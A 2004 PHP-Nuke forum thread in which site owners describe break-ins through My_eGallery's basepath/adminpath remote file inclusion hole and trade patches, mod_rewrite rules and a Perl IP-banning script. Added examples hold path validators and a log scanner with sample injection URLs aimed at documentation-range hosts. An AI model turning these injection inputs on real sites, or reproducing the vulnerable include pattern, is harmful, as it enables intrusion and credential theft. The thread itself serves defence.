The basepath bug is not the only hole. I found an executable file named 4000 in my /modules/My_eGallery/public folder today. Tracing back the logs, I found the following:
The executable launches some type of daemon. Not sure what it does. If someone at nukecops would like a copy of it and the inject.txt script, msg me and I'll send them to you - maybe you can figure out what they do.
I patched displayCategory.php in My_eGallery to block further hack attempts by modifying the original basepath fix, adding the following:
Top of displayCategory.php:
Code:
$bug = strpos($basepath,"http");
$bug2 = strpos($adminpath,"http");
if ($bug === false AND $bug2 === false) {
End of displayCategory.php:
Code:
else {
echo "Yeah, I don't think so dipshit...";
}
As far as I can tell, my host's firewall blocked outgoing traffic on the as-yet unknown TCP or UDP port the script binds to, so luckily nothing in my database or site appears to have been changed. Anyone using My_eGallery should make this change post-haste.
_________________
hamesh Support Mod
Joined: Feb 13, 2003
Posts: 170
Location: Canada
Posted:
Sun Jan 04, 2004 7:59 pm
Err... don't know why four copies of my previous post appear. Moderator, please delete this post and the first three copies of my previous post. Must have been MySQL acting up again
_________________
hamesh Support Mod
Joined: Feb 13, 2003
Posts: 170
Location: Canada
Posted:
Sun Jan 04, 2004 11:30 pm
The basepath and adminpath bugs and fixes still aren't 100% effective. If your server supports mod_rewrite, add this to your rewrite rules to be doubly sure you aren't susceptible to these exploits:
The mod_rewrite rules do work for My_eGallery 2.7.9 for PHP-Nuke. They may not work for the postnuke version (can't say - don't use postnuke myself). If anyone wants to confirm the rules work, load this URL and note the address field in your browser after loading it:
The files being called are empty and both are on my servers so no one's system is going to get buggered...
It's also possible that mod_rewrite isn't supported on that person's web server, or he simply didn't configure things correctly (you can't just drop these in a .htaccess file and expect them to work because of divergent system configurations. Other rewrite options may need to be defined such as RewriteEngine and RewriteBase).
I've already implemented the displayCategory.php fix. The suggested mod_rewrite rules above are just a secondary measure of defense against the adminpath and basepath exploits.
_________________
Last edited by hamesh on Fri Jan 16, 2004 12:26 am; edited 1 time in total
di11rod Nuke Soldier
Joined: Jan 14, 2004
Posts: 26
Posted:
Wed Jan 14, 2004 1:32 am
I added the mod_rewrite directives you suggest and when I tested using the URL you've provided, it redirects my browser....
If that's how my attackers got in, then they'll be held off for now.
I checked my list of admins and they had created an author with super-user status. I deleted the account. I have no other user accounts on this phpNuke install other than my own...
I appreciate any other info people can provide about these breaches.
Appreciatively,
di11rod
Kliber Corporal
Joined: Dec 22, 2003
Posts: 50
Location: Venezuela
Posted:
Fri Jan 30, 2004 1:36 pm
Thanks for these fixes guys! Yep, basepath wasn't the only bug; I realized that when I got haxored again, and my host administrators aren't too happy with the MEG script now. As Joerg said, there are more bugs to fix. I'm really interested in the development of a new version of MEG for PHP-Nuke, with all the security fixes available included; any help will be really appreciated.
If you are interested, please write me to: kliber at petroleobar dot com
thanks in advance..
Kliber.
Nomaed Nuke Soldier
Joined: Sep 24, 2003
Posts: 21
Posted:
Thu Feb 12, 2004 10:43 am
That's one serious bug!
Another example of people who have no understanding of proper programming and security writing modules.
Anyhow, meanwhile, I blocked this with
Code:
<?php
if (!eregi("modules.php", $PHP_SELF)) {
die ("You can't access this file directly...");
}
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
...
...
Someone killed my apache with this exploit... Bastards.
Also, a piece of advice - remove register_globals from php.ini!
_________________ Nobody Escapes the Plague of Black Metal!
smithysrise Nuke Cadet
Joined: Mar 31, 2004
Posts: 2
Posted:
Wed Mar 31, 2004 3:47 pm
One of my sites got hit today too. What's more concerning is that they did a "cat config.php" and therefore have the database passwords etc.
So beware of additional clean-up that's required as a result of things like this.
In my case it appears to be a friendly hack, if such a thing exists - no real damage done. It's still a pain having to sort it out though.
Laffer Corporal
Joined: Jun 03, 2003
Posts: 54
Location: France
Posted:
Thu Apr 01, 2004 2:48 am
Quote:
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
REMOVE the $basepath, $adminpath variables and replace them with the relative path from your nuke directory!!!
If not, you will be still vulnerable!!!!!!
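hamesh's strpos() check and Laffer's advice to drop the request-controlled variables, combined into one hardened include as an added example (not code from the thread or from My_eGallery). The function names, the modules/My_eGallery layout with displayCategory.php under public/, and the use of __FILE__ in place of a cwd-relative path are assumptions; the validator covers what a case-sensitive strpos("http") alone misses (other schemes and wrappers, absolute paths, traversal).

```php
<?php
// Added example, not My_eGallery code. Layer 1 validates $basepath/$adminpath
// for anyone who keeps them; layer 2 derives both from __FILE__ instead.

// True only for a non-empty relative local path with no ".." component.
// Covers what strpos($v, "http") misses: "HTTP://", "ftp://", "php://input",
// "data:", absolute paths, NUL bytes and directory traversal.
function is_plain_local_path($v) {
    if (!is_string($v) || $v === '' || strpos($v, "\0") !== false) {
        return false;
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $v)) {   // any URL scheme or wrapper
        return false;
    }
    if ($v[0] === '/' || $v[0] === '\\') {              // absolute path
        return false;
    }
    foreach (preg_split('#[/\\\\]+#', $v) as $segment) {
        if ($segment === '..') {
            return false;
        }
    }
    return true;
}

// Layer 1: validate before any include(); false means "die here", as the
// thread's else-branch does.
function guarded_include_targets($basepath, $adminpath) {
    if (!is_plain_local_path($basepath) || !is_plain_local_path($adminpath)) {
        return false;
    }
    return array("$basepath/public/imageFunctions.php",
                 "$adminpath/fileFunctions.php");
}

// Layer 2 (preferred, per Laffer): ignore the request entirely. From
// public/displayCategory.php the module root is one directory up (assumed
// layout); __FILE__ does not depend on the working directory, so the
// includes resolve whether the script runs via modules.php or directly.
function my_egallery_include_targets() {
    $root = dirname(dirname(__FILE__));   // modules/My_eGallery
    return array("$root/public/imageFunctions.php",
                 "$root/fileFunctions.php");
}

// In displayCategory.php the two request-controlled includes become:
//   list($image_fns, $file_fns) = my_egallery_include_targets();
//   include $image_fns;
//   include $file_fns;
```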
smithysrise Nuke Cadet
Joined: Mar 31, 2004
Posts: 2
Posted:
Thu Apr 01, 2004 3:44 am
Interesting - and not quite so innocuous. They also downloaded (or at least attempted to download) a Linux ELF binary - which was infected with Linux.RST.B.
hamesh Support Mod
Joined: Feb 13, 2003
Posts: 170
Location: Canada
Posted:
Sat Apr 17, 2004 2:06 am
Been playing around and found a neat little script that can automatically add (ban) IPs to your .htaccess file. I've tailored it to work for the My_eGallery basepath/adminpath exploits.
#!/usr/bin/perl -w
# CGI script called from the mod_rewrite rule below: bans the requesting IP and mails the sysop.
use strict;
use Fcntl qw(:flock);

# Adjust these for your server (placeholder values)
my $htapath  = "/path/to/your/.htaccess";
my $mailprog = "/usr/sbin/sendmail -t";

my $remote_addr  = $ENV{'REMOTE_ADDR'} || '';
my $remote_host  = $ENV{'REMOTE_HOST'} || $remote_addr;
my $remote_agent = $ENV{'HTTP_USER_AGENT'} || '';
my $date = localtime;

# Only ever write a dotted-quad address into .htaccess
$remote_addr =~ /^\d{1,3}(?:\.\d{1,3}){3}$/ || die "unexpected REMOTE_ADDR";

# Open .htaccess file in r/w append mode, lock it, go to top, read current contents into array.
open(HTACCESS,"+>>$htapath") || die $!;
flock(HTACCESS,LOCK_EX);
seek(HTACCESS,0,0);
my @contents = <HTACCESS>;
# Empty .htaccess file, then write new IP ban line and previous contents to it, close to release lock
# (quotemeta escapes the dots so the pattern matches only this address)
truncate(HTACCESS,0);
#print HTACCESS ("SetEnvIf Remote_Addr ^" . quotemeta($remote_addr) . "\$ getout \n# $date $remote_agent\n");
print HTACCESS ("SetEnvIf Remote_Addr ^" . quotemeta($remote_addr) . "\$ getout \n");
print HTACCESS (@contents);
close(HTACCESS);
# output an error message to this bad visitor
print "Content-type: text/html\n\n<html><body>500 Fatal Error - Access Denied</body></html>\n";
# send an e-mail message alerting sysop
open (MAIL, "|$mailprog") || die $!;
print MAIL "To: youremail\@yourdomain.com\n";
print MAIL "From: anotheremail\@yourdomain.com\n";
print MAIL "Subject: My_eGallery exploit attempt\n";
print MAIL "\nAn attempt to exploit the My_eGallery basepath/adminpath security flaw has been logged and blocked.\n\n";
print MAIL "date: $date \n";
print MAIL "ip: $ENV{'REMOTE_ADDR'} \n";
print MAIL "host: $remote_host \n";
print MAIL "agent: $remote_agent \n";
print MAIL "uri: $ENV{'REQUEST_URI'} \n\n";
close (MAIL);
exit;
And the mod_rewrite rules to add to your global config or .htaccess file to make it work:
Code:
# traps bad spiders/bots/offline browsers
SetEnvIf Request_URI "^(/robots\.txt)$" allowsome
<Files *>
order deny,allow
deny from env=getout
allow from env=allowsome
</Files>
# Auto add My_eGallery exploit attempts to .htaccess block list
Edit the script, paths and name of the script as desired. Recommend adding the rewrite rules above the rest of your rewrite rules (GT, etc.). Don't forget to chmod the script 755 or 700 and chown your Apache user.
Previously, I grepped my logs daily and added IPs from attempted hack attempts and wanted to automate it. This works brilliantly. It opens your .htaccess file and writes SetEnv lines for each IP to block, then saves the file back with its original contents and emails you a notice. It works so well I've actually expanded my rewrite rules to call the script for other hack attempts.
I'm working on further modifying this to write to an external RewriteMap file rather than to one's .htaccess file. Could even write IPs to a hosts.deny file with minor modification.
Can't take credit for the script itself (wish I could find the original URL). Will post any progress...
_________________
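hamesh mentions grepping the logs daily for attempts before automating the ban. This is an added example (not from the thread) of that detection step in PHP: it runs over constructed Apache combined-log lines and emits the same "SetEnvIf Remote_Addr ... getout" lines his <Files> block keys on. The function names and the log lines are assumptions.

```php
<?php
// Added example, not from the thread. Scans Apache combined-log lines for
// basepath/adminpath injection attempts and prints SetEnvIf ban lines.
$sample_log = <<<'LOG'
203.0.113.7 - - [04/Jan/2004:19:02:11 -0500] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://198.51.100.9/inject.txt? HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.23 - - [04/Jan/2004:19:05:40 -0500] "GET /modules.php?name=My_eGallery&basepath=modules/My_eGallery HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jan/2004:19:06:02 -0500] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=HTTP://198.51.100.9/x.txt%3F HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.44 - - [04/Jan/2004:19:09:13 -0500] "GET /modules/My_eGallery/public/displayCategory.php?basepath=../../../../etc HTTP/1.1" 200 512 "-" "curl/7.10"
LOG;

// True when basepath or adminpath is anything but a plain relative local path
// (constructed log lines above; any URL scheme, an absolute path, or "..").
function is_injection_attempt($request_target) {
    $query = parse_url($request_target, PHP_URL_QUERY);
    if (!is_string($query)) {
        return false;
    }
    parse_str($query, $params);          // also URL-decodes %3A, %2e%2e, ...
    foreach (array('basepath', 'adminpath') as $name) {
        if (!isset($params[$name]) || !is_string($params[$name])) {
            continue;
        }
        $v = $params[$name];
        if ($v === '' || $v[0] === '/' || $v[0] === '\\'
            || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $v)
            || preg_match('#(^|[/\\\\])\.\.([/\\\\]|$)#', $v)) {
            return true;
        }
    }
    return false;
}

// Distinct offending client IPs, in order of first appearance.
function offending_ips($log_text) {
    $ips = array();
    foreach (preg_split('/\R/', trim($log_text)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"/', $line, $m)) {
            continue;                    // not a combined-log line
        }
        if (is_injection_attempt($m[2]) && !in_array($m[1], $ips, true)) {
            $ips[] = $m[1];
        }
    }
    return $ips;
}

// One SetEnvIf line per IP; preg_quote escapes the dots so only that address matches.
foreach (offending_ips($sample_log) as $ip) {
    echo 'SetEnvIf Remote_Addr ^' . preg_quote($ip) . '$ getout' . "\n";
}
```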
Chipsmunk Nuke Cadet
Joined: Apr 12, 2004
Posts: 2
Posted:
Mon Aug 30, 2004 7:09 pm
I already use the patch in my_egallery but get some errors
Code:
Warning: main(modules/My_eGallery/fileFunctions.php): failed to open stream: No such file or directory in /home/asamboi/public_html/modules/My_eGallery/public/displayCategory.php on line 5
Warning: main(): Failed opening 'modules/My_eGallery/fileFunctions.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/asamboi/public_html/modules/My_eGallery/public/displayCategory.php on line 5